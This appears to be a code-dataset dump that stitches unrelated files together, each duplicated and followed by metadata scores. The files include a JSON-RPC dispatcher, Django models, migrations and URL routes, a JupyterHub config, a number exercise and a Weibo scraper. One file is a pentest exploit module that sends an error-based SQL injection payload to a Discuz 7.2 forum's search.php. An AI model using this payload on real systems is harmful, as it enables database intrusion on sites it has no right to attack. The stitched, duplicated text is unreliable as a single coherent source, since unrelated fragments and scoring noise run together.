JSON-RPC method wrapper. Stores method itself and some metainformation.
:param method: method
:param name: method name
:param context: context name
"""
def __init__(
self,
method: RpcMethod,
name: Optional[str] = None,
context: Optional[Any] = None,
):
self.method = method
self.name = name or method.__name__
self.context = context
meta = utils.set_meta(method, method_name=self.name, context_name=context)
self.validator, self.validator_args = meta.get('validator', default_validator), meta.get('validator_args', {})
def bind(self, params: RpcParams, context: Context = None,) -> RpcMethod:
method_params = self.validator.validate_method(
self.method, params, exclude=(self.context,) if self.context else (), **self.validator_args
)
if self.context is not None:
method_params[self.context] = context
return ft.partial(self.method, **method_params)
def copy(self, **kwargs: Any) -> "Method":
# sourcery skip: dict-assign-update-to-union
cls_kwargs = dict(name=self.name, context=self.context)
cls_kwargs.update(kwargs)
return Method(method=self.method, **cls_kwargs)
def __eq__(self, other: Any) -> bool:
# sourcery skip: assign-if-exp, reintroduce-else, swap-if-expression
if not isinstance(other, Method):
return False
return (self.method, self.name, self.context) == (other.method, other.name, other.context)
class ViewMethod(Method):
"""
View method.
:param view_cls: view class
:param name: view class method name
:param context: context name
"""
def __init__(
self,
view_cls: Type['ViewMixin'],
method_name: str,
name: Optional[str] = None,
context: Optional[Any] = None,
):
super().__init__(getattr(view_cls, method_name), name or method_name, context)
self.view_cls = view_cls
self.method_name = method_name
def bind(self, params: RpcParams, context: Optional[Any] = None) -> RpcMethod:
view = self.view_cls(context) if self.context else self.view_cls() # type: ignore
method = getattr(view, self.method_name)
method_params = self.validator.validate_method(method, params, **self.validator_args)
return ft.partial(method, **method_params)
def copy(self, **kwargs: Any) -> 'ViewMethod':
# sourcery skip: dict-assign-update-to-union
cls_kwargs = dict(name=self.name, context=self.context)
cls_kwargs.update(kwargs)
return ViewMethod(view_cls=self.view_cls, method_name=self.method_name, **cls_kwargs)
class ViewMixin:
"""
Simple class based method handler mixin. Exposes all public methods.
"""
@classmethod
def __methods__(cls) -> Any:
for attr_name in filter(lambda name: not name.startswith('_'), dir(cls)):
attr = getattr(cls, attr_name)
if callable(attr):
yield attr
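# A hypothetical sketch of a class-based handler built on ViewMixin: every public
# callable attribute is exposed as a JSON-RPC method once the view is registered
# through MethodRegistry.view() or a dispatcher. The class and method names here
# are illustration values only.
class _ExampleArithmeticView(ViewMixin):
    def add(self, a: int, b: int) -> int:
        return a + b
    def subtract(self, a: int, b: int) -> int:
        return a - b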
class MethodRegistry:
"""
Method registry.
:param prefix: method name prefix to be used for naming containing methods
"""
def __init__(self, prefix: Optional[str] = None):
self._prefix = prefix
self._registry: Dict[str, Method] = {}
def __iter__(self) -> Iterator[str]:
"""
Returns registry method iterator.
"""
return iter(self._registry)
def __getitem__(self, item: str) -> Method:
"""
Returns a method from the registry by name.
:param item: method name
:returns: found method
:raises: KeyError
"""
return self._registry[item]
def items(self) -> ItemsView[str, Method]:
return self._registry.items()
def keys(self) -> KeysView[str]:
return self._registry.keys()
def values(self) -> ValuesView[Method]:
return self._registry.values()
def get(self, item: str) -> Optional[Method]:
"""
Returns a method from the registry by name.
:param item: method name
:returns: found method or `None`
"""
return self._registry.get(item)
def add(
self,
rpc_method: RpcMethod,
name: Optional[str] = None,
context: Context = None,
) -> RpcMethod:
"""
Decorator adding decorated method to the registry.
:param rpc_method: method
:param name: method name to be used instead of `__name__` attribute
:param context: parameter name to be used as an application context
:returns: decorated method or decorator
"""
# https://stackoverflow.com/questions/65588913/mypy-type-annotations-for-a-decorator
t = TypeVar("t", bound=Callable[..., Any])
def decorator(method: t) -> t:
full_name = ".".join(filter(None, (self._prefix, name or method.__name__)))
self.add_methods(Method(method, full_name, context))
return method
return decorator(rpc_method)
def add_methods(self, *methods: Union[RpcMethod, Method]) -> None:
"""
Adds methods to the registry.
:param methods: methods to be added. Each one can be an instance of :py:class:`xjsonrpc.server.Method`
or plain method
"""
for method in methods:
if isinstance(method, Method):
self._add_method(method)
else:
self.add(method)
def view(
self, maybe_view: Optional[Type[ViewMixin]] = None, context: Optional[Any] = None, prefix: Optional[str] = None,
) -> Union[ViewMixin, Callable[..., Any]]:
"""
Methods view decorator.
:param maybe_view: view class instance or `None`
:param context: application context name
:param prefix: view methods prefix
:return: decorator or decorated view
"""
def decorator(view: Type[ViewMixin]) -> Type[ViewMixin]:
for method in view.__methods__():
full_name = '.'.join(filter(None, (self._prefix, prefix, method.__name__)))
self._add_method(ViewMethod(view, method.__name__, full_name, context))
return view
# maybe_view's type depends on the usage of the decorator. It's a View
# if it's used as `@view` but ``None`` if used as `@view()`.
if maybe_view is None:
return decorator
else:
return decorator(maybe_view)
def merge(self, other: 'MethodRegistry') -> None:
"""
Merges two registries.
:param other: registry to be merged in the current one
"""
for name, method in other.items():
if self._prefix:
name = f'{self._prefix}.{name}'
self._add_method(method.copy(name=name))
def _add_method(self, method: Method) -> None:
if method.name in self._registry:
logger.warning(f"method '{method.name}' already registered")
self._registry[method.name] = method
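# A brief, hypothetical sketch of how this registry might be used: add() works as
# a plain decorator (the function is registered under its own, optionally
# prefixed, name) and merge() pulls another registry in under this one's prefix.
# The prefixes "util"/"math" and the method name "multiply" are illustration
# values only.
def _example_registry_usage() -> MethodRegistry:
    math_registry = MethodRegistry(prefix='math')
    @math_registry.add
    def multiply(a: int, b: int) -> int:
        return a * b  # registered as 'math.multiply'
    root = MethodRegistry(prefix='util')
    root.merge(math_registry)  # now reachable as 'util.math.multiply'
    return root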
class JSONEncoder(xjsonrpc.JSONEncoder):
"""
Server JSON encoder. All custom server encoders should be inherited from it.
"""
def default(self, o: Any) -> Any:
if isinstance(o, validators.base.ValidationError):
return list(o.args)
return super().default(o)
class BaseDispatcher:
"""
Method dispatcher.
:param request_class: JSON-RPC request class
:param response_class: JSON-RPC response class
:param batch_request: JSON-RPC batch request class
:param batch_response: JSON-RPC batch response class
:param json_loader: request json loader
:param json_dumper: response json dumper
:param json_encoder: response json encoder
:param json_decoder: request json decoder
:param middlewares: request middlewares
:param error_handlers: request error handlers
"""
def __init__(
self,
*,
request_class: Type[Request] = v20.Request,
response_class: Type[Response] = v20.Response,
batch_request: Type[BatchRequest] = v20.BatchRequest,
batch_response: Type[BatchResponse] = v20.BatchResponse,
json_loader: Callable[..., Any] = json.loads,
json_dumper: Callable[..., str] = json.dumps,
json_encoder: Type[JSONEncoder] = JSONEncoder,
json_decoder: Optional[Type[json.JSONDecoder]] = None,
middlewares: Iterable[Callable[..., Any]] = (),
error_handlers: Dict[Union[None, int, Exception], List[Callable[..., Any]]] = {},
):
self._json_loader = json_loader
self._json_dumper = json_dumper
self._json_encoder = json_encoder
self._json_decoder = json_decoder
self._request_class = request_class
self._response_class = response_class
self._batch_request = batch_request
self._batch_response = batch_response
self._middlewares = list(middlewares)
self._error_handlers = error_handlers
self._registry = MethodRegistry()
@property
def registry(self) -> MethodRegistry:
return self._registry
def add(
self,
method: RpcMethod,
name: Optional[str] = None,
context: Optional[Any] = None,
) -> None:
"""
Adds method to the registry.
:param method: method
:param name: method name
:param context: application context name
"""
self._registry.add(method, name, context)
def add_methods(self, *methods: Union[MethodRegistry, Method, RpcMethod]) -> None:
"""
Adds methods to the registry.
:param methods: method list. Each method may be an instance of :py:class:`xjsonrpc.server.MethodRegistry`,
:py:class:`xjsonrpc.server.Method` or plain function
"""
for method in methods:
if isinstance(method, MethodRegistry):
self._registry.merge(method)
elif isinstance(method, Method):
self._registry.add_methods(method)
else:
self._registry.add(method)
def view(self, view: Type[ViewMixin]) -> None:
"""
Adds class based view to the registry.
:param view: view to be added
"""
self._registry.view(view)
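# A hypothetical sketch of the middleware shape BaseDispatcher accepts: each
# middleware is called with the request, the application context and the next
# handler (passed as the keyword argument `handler`) and returns that handler's
# result. Whether it must be a plain function or a coroutine depends on whether
# it is attached to Dispatcher or AsyncDispatcher.
def _example_logging_middleware(request: Request, context: Optional[Any], handler: Callable[..., Any]) -> Any:
    logger.debug("middleware saw method %s", request.method)
    return handler(request, context)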
class Dispatcher(BaseDispatcher):
def dispatch(self, request_text: str, context: Optional[Any] = None) -> Optional[str]:
"""
Deserializes request, dispatches it to the required method and serializes the result.
:param request_text: request text representation
:param context: application context (if supported)
:return: response text representation
"""
logger.getChild('request').debug("request received: %s", request_text)
response: Union[Response, BatchResponse, UnsetType] = UNSET
try:
request_json = self._json_loader(request_text, cls=self._json_decoder)
if isinstance(request_json, (list, tuple)):
batch_request = self._batch_request.from_json(request_json)
response = self._batch_response(
*cast(
BatchResponse,
filter(
lambda resp: resp is not UNSET, (
self._handle_request(request, context)
for request in batch_request
)
)
)
)
else:
request = self._request_class.from_json(request_json)
response = self._handle_request(request, context)
except json.JSONDecodeError as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.ParseError(data=str(e)))
except (xjsonrpc.exceptions.DeserializationError, xjsonrpc.exceptions.IdentityError) as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.InvalidRequestError(data=str(e)))
if isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
logger.getChild('response').debug("response sent: %s", response_text)
return response_text
def _handle_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
try:
handler = self._handle_rpc_request
for middleware in reversed(self._middlewares):
handler = ft.partial(middleware, handler=handler)
return handler(request, context)
except xjsonrpc.exceptions.JsonRpcError as e:
logger.info("method execution error %s(%r): %r", request.method, request.params, e)
error = e
except Exception as e:
logger.exception("internal server error: %r", e)
error = xjsonrpc.exceptions.InternalError()
for handler in it.chain(self._error_handlers.get(None, []), self._error_handlers.get(error.code, [])):
error = handler(request, context, error)
if request.id is None:
return UNSET
return self._response_class(id=request.id, error=error)
def _handle_rpc_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
result = self._handle_rpc_method(request.method, request.params, context)
if request.id is None:
return UNSET
return self._response_class(id=request.id, result=result)
def _handle_rpc_method(
self, method_name: str, params: Optional[Union[lst, dct]], context: Optional[Any]
) -> Any:
method = self._registry.get(method_name)
if method is None:
raise xjsonrpc.exceptions.MethodNotFoundError(data=f"method '{method_name}' not found")
try:
bound = method.bind(params, context=context)
except validators.ValidationError as e:
raise xjsonrpc.exceptions.InvalidParamsError(data=e) from e
try:
return bound()
except xjsonrpc.exceptions.JsonRpcError:
raise
except Exception as e:
logger.exception("method unhandled exception %s(%r): %r", method_name, params, e)
raise xjsonrpc.exceptions.ServerError() from e
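# A minimal, hypothetical usage sketch of the synchronous dispatcher: register a
# plain function and hand dispatch() a raw JSON-RPC 2.0 request string. The
# method name "echo", the request id and the params are illustration values only.
def _example_sync_dispatch() -> Optional[str]:
    dispatcher = Dispatcher()
    def echo(message: str) -> str:
        return message
    dispatcher.add(echo)
    request_text = json.dumps({"jsonrpc": "2.0", "id": 1, "method": "echo", "params": {"message": "hi"}})
    return dispatcher.dispatch(request_text)  # serialized response, or None for a notification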
class AsyncDispatcher(BaseDispatcher):
"""
Asynchronous method dispatcher.
"""
async def dispatch(self, request_text: str, context: Optional[Any] = None) -> Optional[str]:
"""
Deserializes request, dispatches it to the required method and serializes the result.
:param request_text: request text representation
:param context: application context (if supported)
:return: response text representation
"""
logger.getChild('request').debug("request received: %s", request_text)
response: Union[Response, BatchResponse, UnsetType] = UNSET
try:
request_json = self._json_loader(request_text, cls=self._json_decoder)
if isinstance(request_json, (list, tuple)):
batch_request = self._batch_request.from_json(request_json)
response = self._batch_response(
*filter(
lambda resp: resp is not UNSET, await asyncio.gather(
*(self._handle_request(request, context)
for request in batch_request)
),
)
)
else:
request = self._request_class.from_json(request_json)
response = await self._handle_request(request, context)
if not response or isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
except json.JSONDecodeError as e:
response = self._response_class(
id=None, error=xjsonrpc.exceptions.ParseError(data=str(e))
)
except (xjsonrpc.exceptions.DeserializationError,
xjsonrpc.exceptions.IdentityError) as e:
response = self._response_class(id=None, error=xjsonrpc.exceptions.InvalidRequestError(data=str(e)))
if isinstance(response, UnsetType):
return None
response_text = self._json_dumper(response.to_json(),
cls=self._json_encoder)
logger.getChild('response').debug("response sent: %s", response_text)
return response_text
async def _handle_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
try:
handler = self._handle_rpc_request
for middleware in reversed(self._middlewares):
handler = ft.partial(middleware, handler=handler)
return await handler(request, context)
except xjsonrpc.exceptions.JsonRpcError as e:
logger.info("method execution error %s(%r): %r", request.method, request.params, e)
error = e
except Exception as e:
logger.exception("internal server error: %r", e)
error = xjsonrpc.exceptions.InternalError()
for handler in it.chain(self._error_handlers.get(None, []), self._error_handlers.get(error.code, [])):
error = await handler(request, context, error)
if request.id is None:
return UNSET
return self._response_class(id=request.id, error=error)
async def _handle_rpc_request(self, request: Request, context: Optional[Any]) -> Union[UnsetType, Response]:
result = await self._handle_rpc_method(request.method, request.params, context)
if request.id is None:
return UNSET
return self._response_class(id=request.id, result=result)
async def _handle_rpc_method(
self, method_name: str, params: RpcParams, context: Optional[Any],
) -> Any:
method = self._registry.get(method_name)
if method is None:
raise xjsonrpc.exceptions.MethodNotFoundError(data=f"method '{method_name}' not found")
try:
bound = method.bind(params, context=context)
except validators.ValidationError as e:
raise xjsonrpc.exceptions.InvalidParamsError(data=e) from e
try:
result = bound()
if asyncio.iscoroutine(result):
result = await result
return result
except xjsonrpc.exceptions.JsonRpcError:
raise
except Exception as e:
logger.exception("method unhandled exception %s(%r): %r", method_name, params, e)
raise xjsonrpc.exceptions.ServerError() from e
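# A hypothetical sketch of the error_handlers mapping BaseDispatcher accepts: the
# key None applies a handler to every error, an integer key applies it to that
# JSON-RPC error code only, and each handler may return a replacement error. For
# AsyncDispatcher the handlers are awaited, so they should be coroutines.
async def _example_error_handler(request: Request, context: Optional[Any], error: xjsonrpc.exceptions.JsonRpcError) -> xjsonrpc.exceptions.JsonRpcError:
    logger.warning("request %s failed with %r", request.method, error)
    return error
_example_error_aware_dispatcher = AsyncDispatcher(error_handlers={None: [_example_error_handler]})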
| en | 0.709107 | JSON-RPC method wrapper. Stores method itself and some metainformation. :param method: method :param name: method name :param context: context name # sourcery skip: dict-assign-update-to-union # sourcery skip: assign-if-exp, reintroduce-else, swap-if-expression View method. :param view_cls: view class :param name: view class method name :param context: context name # type: ignore # sourcery skip: dict-assign-update-to-union Simple class based method handler mixin. Exposes all public methods. Method registry. :param prefix: method name prefix to be used for naming containing methods Returns registry method iterator. Returns a method from the registry by name. :param item: method name :returns: found method :raises: KeyError Returns a method from the registry by name. :param item: method name :returns: found method or `None` Decorator adding decorated method to the registry. :param rpc_method: method :param name: method name to be used instead of `__name__` attribute :param context: parameter name to be used as an application context :returns: decorated method or decorator # https://stackoverflow.com/questions/65588913/mypy-type-annotations-for-a-decorator Adds methods to the registry. :param methods: methods to be added. Each one can be an instance of :py:class:`xjsonrpc.server.Method` or plain method Methods view decorator. :param maybe_view: view class instance or `None` :param context: application context name :param prefix: view methods prefix :return: decorator or decorated view # maybe_view's type depends on the usage of the decorator. It's a View # if it's used as `@view` but ``None`` if used as `@view()`. Merges two registries. :param other: registry to be merged in the current one Server JSON encoder. All custom server encoders should be inherited from it. Method dispatcher. :param request_class: JSON-RPC request class :param response_class: JSON-RPC response class :param batch_request: JSON-RPC batch request class :param batch_response: JSON-RPC batch response class :param json_loader: request json loader :param json_dumper: response json dumper :param json_encoder: response json encoder :param json_decoder: request json decoder :param middlewares: request middlewares :param error_handlers: request error handlers Adds method to the registry. :param method: method :param name: method name :param context: application context name Adds methods to the registry. :param methods: method list. Each method may be an instance of :py:class:`xjsonrpc.server.MethodRegistry`, :py:class:`xjsonrpc.server.Method` or plain function Adds class based view to the registry. :param view: view to be added Deserializes request, dispatches it to the required method and serializes the result. :param request_text: request text representation :param context: application context (if supported) :return: response text representation Asynchronous method dispatcher. Deserializes request, dispatches it to the required method and serializes the result. :param request_text: request text representation :param context: application context (if supported) :return: response text representation | 1.998961 | 2 |
exploit/cms_discuz_7_2_sortid_sql_injection.py | Micr067/pentestdb | 686 | 6632544 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2015 alpha1e0
'''
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
class DiscuzSI(Exploit):
expName = u"Discuz 7.2 主题分类 SQL注入"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "discuz"
appVersion = "7.x"
reference = ['http://www.wooyun.org/bugs/wooyun-2014-068707']
description = u'''
该exploit未验证通过
漏洞利用条件:1.Discuz 7.2,2.开启主题分类;2.登陆
'''
def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = {
"formhash":"04949b0",
"srchtxt":"aa",
"srchtype":"threadsort",
"st":"on",
"sortid":"3",
"selectsortid": "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#".format(sig),
"searchsubmit":"true"
}
url = self.urlJoin("/search.php")
response = self.http.post(url, data=payload)
if response.status_code==200:
if sig in response.content and "SQL" in response.content:
result['fullpath'] = response.request.body
result['payload'] = response.request.body
return result
| #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2015 alpha1e0
'''
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
class DiscuzSI(Exploit):
expName = u"Discuz 7.2 主题分类 SQL注入"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "discuz"
appVersion = "7.x"
reference = ['http://www.wooyun.org/bugs/wooyun-2014-068707']
description = u'''
该exploit未验证通过
漏洞利用条件:1.Discuz 7.2,2.开启主题分类;2.登陆
'''
def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = {
"formhash":"04949b0",
"srchtxt":"aa",
"srchtype":"threadsort",
"st":"on",
"sortid":"3",
"selectsortid": "3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#".format(sig),
"searchsubmit":"true"
}
url = self.urlJoin("/search.php")
response = self.http.post(url, data=payload)
if response.status_code==200:
if sig in response.content and "SQL" in response.content:
result['fullpath'] = response.request.body
result['payload'] = response.request.body
return result
| zh | 0.255431 | #!/usr/bin/env python #-*- coding:utf-8 -*- Pentestdb, a database for penetration test. Copyright (c) 2015 alpha1e0 该exploit未验证通过 漏洞利用条件:1.Discuz 7.2,2.开启主题分类;2.登陆 #".format(sig), | 2.38675 | 2 |
blog/models.py | siyingcheng/bAd-Robot | 0 | 6632545 | import markdown
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.utils.html import strip_tags
from mdeditor.fields import MDTextField
class Category(models.Model):
name = models.CharField(max_length=64)
class Meta:
verbose_name = '分类'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
def posts(self):
return self.post_set.filter(is_delete=False)
class Label(models.Model):
name = models.CharField(max_length=64)
class Meta:
verbose_name = '标签'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Post(models.Model):
title = models.CharField('标题', max_length=128)
# body = models.TextField('正文')
body = MDTextField('正文')
c_time = models.DateField('创建时间', auto_now_add=True)
m_time = models.DateField('修改时间', auto_now=True)
excerpt = models.CharField('摘要', max_length=200, blank=True)
category = models.ForeignKey(Category, verbose_name='分类', null=True, blank=True, on_delete=models.SET_NULL)
labels = models.ManyToManyField(Label, verbose_name='标签', blank=True)
author = models.ForeignKey(User, verbose_name='作者', null=True, blank=True, on_delete=models.SET_NULL)
is_delete = models.BooleanField('是否删除', default=False)
class Meta:
verbose_name = '文章'
verbose_name_plural = verbose_name
ordering = ['-c_time', '-pk']
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:detail', kwargs={'pk': self.pk})
def save(self, *args, **kwargs):
        # First instantiate a Markdown renderer for the body text.
        # The excerpt does not need a table of contents, so the toc extension is left out.
md = markdown.Markdown(extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
])
        # Render the Markdown body to HTML first,
        # then use strip_tags to remove every HTML tag from the result,
        # and assign up to the first 197 characters (plus an ellipsis) to excerpt.
if not self.excerpt:
_body = strip_tags(md.convert(self.body))
length = min(len(_body), 197)
self.excerpt = _body[:length] + '...'
super().save(*args, **kwargs)
| import markdown
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.utils.html import strip_tags
from mdeditor.fields import MDTextField
class Category(models.Model):
name = models.CharField(max_length=64)
class Meta:
verbose_name = '分类'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
def posts(self):
return self.post_set.filter(is_delete=False)
class Label(models.Model):
name = models.CharField(max_length=64)
class Meta:
verbose_name = '标签'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Post(models.Model):
title = models.CharField('标题', max_length=128)
# body = models.TextField('正文')
body = MDTextField('正文')
c_time = models.DateField('创建时间', auto_now_add=True)
m_time = models.DateField('修改时间', auto_now=True)
excerpt = models.CharField('摘要', max_length=200, blank=True)
category = models.ForeignKey(Category, verbose_name='分类', null=True, blank=True, on_delete=models.SET_NULL)
labels = models.ManyToManyField(Label, verbose_name='标签', blank=True)
author = models.ForeignKey(User, verbose_name='作者', null=True, blank=True, on_delete=models.SET_NULL)
is_delete = models.BooleanField('是否删除', default=False)
class Meta:
verbose_name = '文章'
verbose_name_plural = verbose_name
ordering = ['-c_time', '-pk']
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:detail', kwargs={'pk': self.pk})
def save(self, *args, **kwargs):
        # First instantiate a Markdown renderer for the body text.
        # The excerpt does not need a table of contents, so the toc extension is left out.
md = markdown.Markdown(extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
])
        # Render the Markdown body to HTML first,
        # then use strip_tags to remove every HTML tag from the result,
        # and assign up to the first 197 characters (plus an ellipsis) to excerpt.
if not self.excerpt:
_body = strip_tags(md.convert(self.body))
length = min(len(_body), 197)
self.excerpt = _body[:length] + '...'
super().save(*args, **kwargs)
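# A small, hypothetical sketch of the excerpt logic above taken out of the model:
# render the Markdown to HTML, strip the tags, and keep at most the first 197
# characters followed by an ellipsis. The helper name is an illustration only.
def _make_excerpt(body_md: str, limit: int = 197) -> str:
    md = markdown.Markdown(extensions=['markdown.extensions.extra'])
    text = strip_tags(md.convert(body_md))
    return text[:min(len(text), limit)] + '...'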
| zh | 0.968222 | # body = models.TextField('正文') # 首先实例化一个 Markdown 类,用于渲染 body 的文本。 # 由于摘要并不需要生成文章目录,所以去掉了目录拓展。 # 先将 Markdown 文本渲染成 HTML 文本 # strip_tags 去掉 HTML 文本的全部 HTML 标签 # 从文本摘取前 54 个字符赋给 excerpt | 2.230637 | 2 |
src/pretalx/person/migrations/0030_auto_20211127_0152.py | lili668668/pretalx | 0 | 6632546 | <reponame>lili668668/pretalx
# Generated by Django 3.2.8 on 2021-11-27 01:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('submission', '0063_remove_track_color'),
('person', '0029_contact_track'),
]
operations = [
migrations.RemoveField(
model_name='speakerinformation',
name='limit_types',
),
migrations.AlterField(
model_name='contact',
name='track',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='contacts', to='submission.track'),
),
]
| # Generated by Django 3.2.8 on 2021-11-27 01:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('submission', '0063_remove_track_color'),
('person', '0029_contact_track'),
]
operations = [
migrations.RemoveField(
model_name='speakerinformation',
name='limit_types',
),
migrations.AlterField(
model_name='contact',
name='track',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='contacts', to='submission.track'),
),
] | en | 0.905643 | # Generated by Django 3.2.8 on 2021-11-27 01:52 | 1.459703 | 1 |
jupyterhub_configurator_config.py | GeorgianaElena/jupyterhub-configurator | 1 | 6632547 | import os
import json
HERE = os.path.dirname(os.path.abspath(__file__))
c.Configurator.selected_fields = ["z2jh.image", "z2jh.default_interface"]
| import os
import json
HERE = os.path.dirname(os.path.abspath(__file__))
c.Configurator.selected_fields = ["z2jh.image", "z2jh.default_interface"]
| none | 1 | 1.703809 | 2 |
|
MissingPersons/urls.py | sriramcu/MissingPersonsTracing | 0 | 6632548 | <gh_stars>0
"""django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from police import views as police_views
from django.views.generic import RedirectView
from django.conf.urls import re_path, url, include
urlpatterns = [
path('admin/', admin.site.urls),
path('register/', police_views.register, name='register'),
path('register_case/', police_views.register_case, name='register_case'),
path('profile/', police_views.profile, name='profile'),
path('tables/', police_views.tables, name='tables'),
path('status/', police_views.status, name='status'),
path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
path('facial_recognition/', police_views.facial_recognition, name='facial_recognition'),
path('show_all/', police_views.show_all, name='show_all'),
path('upload/', police_views.upload, name='upload'),
path('',police_views.base, name='base'),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| """django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from police import views as police_views
from django.views.generic import RedirectView
from django.conf.urls import re_path, url, include
urlpatterns = [
path('admin/', admin.site.urls),
path('register/', police_views.register, name='register'),
path('register_case/', police_views.register_case, name='register_case'),
path('profile/', police_views.profile, name='profile'),
path('tables/', police_views.tables, name='tables'),
path('status/', police_views.status, name='status'),
path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),
path('facial_recognition/', police_views.facial_recognition, name='facial_recognition'),
path('show_all/', police_views.show_all, name='show_all'),
path('upload/', police_views.upload, name='upload'),
path('',police_views.base, name='base'),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | en | 0.545488 | django_project URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) | 2.438789 | 2 |
Assignment5.py | AnkurDesai11/PY4E | 0 | 6632549 | '''
Created on 16 Aug, 2020
@author: ABD
'''
largest = None
smallest = None
num = None
inp = None
while inp!='done' :
try :
inp = input("Enter a number: ")
if inp=='done' :
break
num = int(inp)
if largest==None :
largest=num
if smallest==None :
smallest=num
if largest<num :
largest=num
if smallest>num :
smallest=num
except :
print("Invalid input")
print("Maximum is", largest)
print("Minimum is", smallest) | '''
Created on 16 Aug, 2020
@author: ABD
'''
largest = None
smallest = None
num = None
inp = None
while inp!='done' :
try :
inp = input("Enter a number: ")
if inp=='done' :
break
num = int(inp)
if largest==None :
largest=num
if smallest==None :
smallest=num
if largest<num :
largest=num
if smallest>num :
smallest=num
except :
print("Invalid input")
print("Maximum is", largest)
print("Minimum is", smallest) | en | 0.705805 | Created on 16 Aug, 2020 @author: ABD | 3.963786 | 4 |
python/weibo/ajax.py | fengyuanzemin/spider-example | 0 | 6632550 | import requests
from urllib.parse import urlencode
from pyquery import PyQuery as pq
import time
base_url = 'https://m.weibo.cn/api/container/getIndex?'
headers = {
'Host': 'm.weibo.cn',
'Referer': 'https://m.weibo.cn/u/2830678474',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
}
max_page = 10
array = []
def get_page(page):
params = {
'type': 'uid',
'value': '3217179555',
'containerid': '1076033217179555',
'page': page
}
url = base_url + urlencode(params)
try:
response = requests.get(url, headers=headers)
if response.status_code == 200:
return response.json(), page
except requests.ConnectionError as e:
print('Error', e.args)
def parse_page(json, page: int):
if json:
items = json.get('data').get('cards')
for index, item in enumerate(items):
if page == 1 and index == 1:
continue
else:
item = item.get('mblog', {})
weibo = {}
weibo['id'] = item.get('id')
weibo['text'] = pq(item.get('text')).text()
weibo['attitudes'] = item.get('attitudes_count')
weibo['comments'] = item.get('comments_count')
weibo['reposts'] = item.get('reposts_count')
yield weibo
if __name__ == '__main__':
for page in range(1, max_page + 1):
json = get_page(page)
results = parse_page(*json)
for result in results:
print(result)
array.append(result)
time.sleep(1)
        # Skipping writing the results to a file for now.
| import requests
from urllib.parse import urlencode
from pyquery import PyQuery as pq
import time
base_url = 'https://m.weibo.cn/api/container/getIndex?'
